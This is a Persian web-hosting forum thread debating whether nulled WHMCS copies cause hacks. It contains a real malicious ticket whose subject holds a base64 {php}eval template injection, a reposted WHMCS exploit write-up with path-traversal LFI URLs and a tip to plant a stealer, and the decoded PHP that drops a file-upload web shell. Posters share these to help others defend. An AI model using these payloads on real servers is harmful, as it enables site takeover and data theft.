هک یا بچه بازی؟!!!whmcs!

[atilnic]

نال 90% با اصل برابر میشه فقط موارد اطلاع رسانی و دسترسی به امکانات جدید فراهم نیست اونم فقط به صورت مستقیم.
و نمیشه گفت هک شدن در نتیجه نال شدن هست.
مسئله اینجاست که هر اسکریپتی باگ داره و این کاربر هست که قبل استفاده باید از اینا اطلاع داشته باشه و رفع بکنه.

اونی که میاد نال میزنه و ...
اصلا کـــــــــــــــــــــــا ری نــــــــــــــــدارم!!!!!!!! !!!!!!
هاستینگ که پول یک لایسنس whmcs که اساس کارش هست رو نداره،اصلا هساتینگ نیست!!!
تمام شد!!!

[taranoome]

امنیت هیچ موقع 100% نیست
کاربری که به فکر امنیتش باشه یعنی براش مهم باشه مطمئنن با نسخه ی نال هم امینت خودش رو به حد نصاب می رسونه
کاربری هم به فکر امنیت نباشه چه با لاینسس چه بی لاینسس خواهد خورد

به نظر من هرکی نال میکنه یه باگ هم داخلش نالش میزاره در صورت لزوم
اکثرا هم به خاطر رعایت نکردن حق سایتی هست که نال رو انجام میده این موارد پیش میاد
یعنی مثلا پرشن اسکریپت میاد نال میکنه و یک هاستینگ یا یک شخص میاد این اسکریپت رو دانلود میکنه و قسمت پرشین اسکریپت یا نام اون سایت رو حذف میکنه من هم باشم ناراحت میشم و باگی که تو اسکریپ گذاشته باشم لو میدم به یه هکر
به نظر من نسخه نال شده برای چیزایی خوبه استفاده کنیم که خطری رو برای کاربران سایت نداشته باشه نه یه اسکریپ پشتیبانی کاربران هاستینگ استفاده کنیم که اینجوری سایت من که از اون سایت سرویس گرفته بسته شه و نتونم با اون سرویس دهنده تماس بگیرم برای تغییریک دی ان اس یا انتقال اطلاعات هاستینگ

[maryam1]

من نال نبودم هک شدم

---------- Post added at 05:55 PM ---------- Previous post was at 05:52 PM ----------

الان یه تیکت اومد واسم

کاربر: hamid rahmati #16
بخش: بخش فروش
موضوع: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ q MGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMT FiSFJwY0dGeWRDOW1iM0p0TFdS aGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2 IyRmtaWElpUGljN0RRcGxZMmh2 SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm 1sc1pTSWdjMmw2WlQwaU5UQWlQ anhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0 p0YVhRaUlHbGtQU0pmZFhCc0lp QjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG 1LQ0FrWDFCUFUxUmJKMTkxY0d3 blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2 VTZ2tYMFpKVEVWVFd5ZG1hV3hs SjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYk dVblhWc25ibUZ0WlNkZEtTa2dl eUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVH d2WWo0OFluSStQR0p5UGljN0lI ME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZE JSMEZNSUNFaElUd3ZZajQ4WW5J K1BHSnlQaWM3SUgwTkNuME5DajgrIik7CiRmbyA9IGZvcGVuKC Jkb3dubG9hZHMvYjB4LnBocCIs InciKTsKZndyaXRlKCRmbywkY29kZSk7='));{/php}

اهمیت: Medium

محتوای سوال

=============================
hi

----------------------------
IP Address: 46.19.139.252

[plastic]

نمیدونم چه ربطی به نال بودن داره دیگه با این موارد که عرض شد باید نتیجه گیری میشد که به نال بودن مربوط نمیشه .
کسی هم که یه چیزی رو نال میکنه نمیاد توش باگ هم درست بکنه!! چون در این صورت نال کردنش = سرگرمی و تفریح و کار الکی
پس به نال بودنش هیچ ربطی نداره.
به هر حال شاید هم ربط داشته باشه و در جریان نباشیم!

[HugeServer]

من نال نبودم هک شدم

---------- Post added at 05:55 PM ---------- Previous post was at 05:52 PM ----------

الان یه تیکت اومد واسم

کاربر: hamid rahmati #16
بخش: بخش فروش <snipped>اهمیت: Medium

محتوای سوال

=============================
hi

----------------------------
IP Address: 46.19.139.252

شما patch امنیتی رو نصب کرده بودید؟

[maryam1]

بله هم پچو هم باقی چیزارو البته هک رو قبل از نصب پچ شدم
الان طذف سوسک شد

[plastic]

بنا به این که خیلی از دوستان ایرانی توسط این باگ هک میشن این اکسپلویت رو قرار میدم تا با توجه به اون مقابله بکنید:

کد:

$b0x#  WHMCS ( WHMCompleteSolution )  3.x / 4.x  Multiple Vulnerability !
$b0x#  ZxH-Labs
$b0x#  1st-NOV-11
$b0x#  Www.Sec4ever.coM
$b0x#  WH-03 On Windows IIS 6.0

========================================================
b0x@1337b0x:/b0x/Exploits/WebAPP# whoami
ZxH-Labs | Www.Sec4ever.coM
b0x@1337b0x:/b0x/Exploits/WebAPP# cat WH-03.XPL

EXPL Type : Local File Disclosure
              
Files : Submitticket.php , Downloads.php

       -> I: submitticket.php?step=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
             EX : submitticket.php?step=b0x&templatefile=../../../../../../../../../boot.ini%00

       ->II: downloads.php?action=[Unknown Value]&templatefile=../../../../../../../../../boot.ini%00
            EX : downloads.php?action=b0x&templatefile=../../../../../../../../../boot.ini%00


b0x@1337b0x:/b0x/Exploits/WebAPP#
b0x@1337b0x:/b0x/Exploits/WebAPP#  cat WH-03.bug

Bug TYPE : Local File Include
Bug File : Reports.php

             -I : reports.php?report=[LFI]%00
                EX : admin/reports.php?report=../../../../../../../boot.ini%00
            
               You Can Use This Bug When You Get Forbidden Access In Lux Symlink !
            However You Can Make Stealer into "/tmp" Directory With EXT .htm And The Full ISSUE Will Be
                  -FI : admin/reports.php?report=../../../../../../../tmp/b0x.htm%00
              And Don't Forget To Use IFRAME With Evil Code'z =))


b0x@1337b0x:/b0x/Exploits/WebAPP# Logout
========================================================
$b0x# Greet'z 2 T0R0B0XHACKER | X-Shadow | Sec4ever |  TNT_HACKER | r1z | Tw1st3r | S4S
Cyb3r-1st | Red Virus | I-Hmx | h311 c0d3 | TacticiaN  | Th3MMA | FreeMan(LY) | Ma3stro_DZ
Mr.L4iv3  And All Q8'z

./b0x

[faranetwork]

امن ترین سرور یک سرور خاموش است!

[plastic]

کل کدی که اینجکت میشه در تیکت ها( با توجه به ارسال maryam1) این هست:

کد:

<?php
$code = base64_decode("PD9waHANCmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7DQplY2hvICc8aW5wdXQgdHlwZT0iZmlsZSIgbmFtZT0iZmlsZSIgc2l6ZT0iNTAiPjxpbnB1dCBuYW1lPSJfdXBsIiB0eXBlPSJzdWJtaXQiIGlkPSJfdXBsIiB2YWx1ZT0iVXBsb2FkIj48L2Zvcm0+JzsNCmlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsNCglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgU1VLU0VTICEhITwvYj48YnI+PGJyPic7IH0NCgllbHNlIHsgZWNobyAnPGI+VXBsb2FkIEdBR0FMICEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+");
$fo = fopen("downloads/b0x.php","w");
fwrite($fo,$code);
?>

و $code عبارته از:

کد:

<?php
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
	else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

با توجه به این موارد میتونید جلوی مورد رو بگیرید.

[MbjHosting]

dr.saeed : این یک مورد با بقیه فرق داره کمی تو انجمن جست و جو کنین

اگر منظورتان گروه ما است هر کسی کوچکترین نارضایتی از ما دارد منتظریم که در بخش انتقاد و پیشنهاد همراه با مدرک تاپیک ارائه کرده و ما نیز با مدرک پاسخ آن ها را خواهیم داد.

با سلام
میدونم در حدی نیستم که بخام نظر بدم و این نظر، نظر شخصیه!
به نظر من کار خوبی میکنه هر کی هک کرده
چون طرف هیچ وقت نمیفهمید که سایتش باگ داره
بعدشم هاستینگ ها خودشون نسخه نال شده استفاده میکنند بعد که میرسه نوبت کاربرانشون میگن باید لایتکس بگیری خداییش این دیگه اخرشه
خدایی هرکی بوده دمش گرم

خوب یک مثل اصیل و اینترنتی ایرانی میگه :
هرکی نال نصب میکنه،صفحه هکشم هم میبینه
taranoome جای خوبی اشاره کرد،کاربر نال نصب کنه سرویس بسته میشه اما سرویس دهنده ...
و نال همیشه باگ داره و ... یا باید نصب نکنید یا باید رفع گردد در صورت آموزش دیده باشید
کسانی که مشکل باگ دارند میتونید به خود whmcs در صورت داشتن لایسنس خبر بدند

ما به هیچ عنوان از نسخه نال شده استفاده نمی کرده، نمی کنیم و نخواهیم کرد و تمامی مدارک مبنی بر خریداری لایسنس از شرکت فراسو موجود است.